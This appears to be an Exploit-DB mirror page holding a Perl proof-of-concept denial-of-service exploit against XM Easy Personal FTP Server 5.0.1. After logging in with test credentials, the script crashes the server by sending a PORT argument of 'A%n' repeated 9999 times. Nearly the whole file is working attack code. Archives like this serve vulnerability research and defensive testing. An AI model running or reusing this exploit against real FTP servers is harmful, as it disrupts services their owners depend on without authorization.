exploit-db-mirror/exploits/windows/dos/1949.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

31 lines
No EOL
951 B
Perl
Executable file

#!/usr/bin/perl
# -----------------------------------------------------------
# Name : XM Easy Personal FTP Server
# Version : 5.0.1
# -----------------------------------------------------------
# Type : dos / remote
# Multiple buffer overflows
# Port and multiple commands with A%n, ...
# -----------------------------------------------------------
# Jerome Athias - https://www.securinfos.info
# -----------------------------------------------------------
use Net::FTP;
$host = @ARGV[0];
if ($host)
{
print "\n- XM Easy Personal FTP Server 5.0.1 - PoC DoS Exploit\n-
Jerome Athias\nhttps://www.securinfos.info";
$ftp = Net::FTP->new($host, Debug => 0);
$ftp->login('test','test'); #Maybe anonymous works ;-)
$ftp->port("\x41\x25\x6E"x9999);
}
else {
print "\n- XM Easy Personal FTP Server 5.0.1 - PoC DoS Exploit\n-
Jerome Athias\nhttps://www.securinfos.info\n\n- Usage: $0 host\n";
}
# milw0rm.com [2006-06-24]